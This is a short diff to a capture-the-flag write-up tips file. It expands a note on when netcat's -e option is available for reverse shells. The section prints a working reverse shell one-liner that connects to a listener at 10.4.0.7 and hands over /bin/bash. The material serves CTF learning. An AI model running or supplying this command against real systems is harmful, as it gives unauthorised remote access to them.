ChrisPritchard/ctf-writeups/TIPS-AND-TRICKS.md

 ## Reverse shells

-If netcat with -e exists (very rare in CTFs, in my experience):
+If netcat with -e exists (nc.traditional, very rare in CTFs, in my experience) or if the static ncat binary has been copied across:

 `nc -e /bin/bash 10.4.0.7 4444`